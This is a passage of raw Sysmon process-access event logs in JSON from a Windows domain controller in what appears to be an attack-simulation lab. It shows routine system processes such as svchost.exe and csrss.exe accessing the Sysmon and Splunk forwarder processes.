ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:01.857","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1369-5F25-0000-001027980E00}","TargetProcessId":"1476","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8338,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:01.857\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:01.857","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8339,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:01.857\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:01.857","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8340,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:01.857\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:01.857","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8341,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:01.857\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:01.857","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8342,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:01.857\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:01.857","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8343,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:01.857\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:01.857","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8344,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:01.857\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:01.857","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8345,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:01.857\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:01.857","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560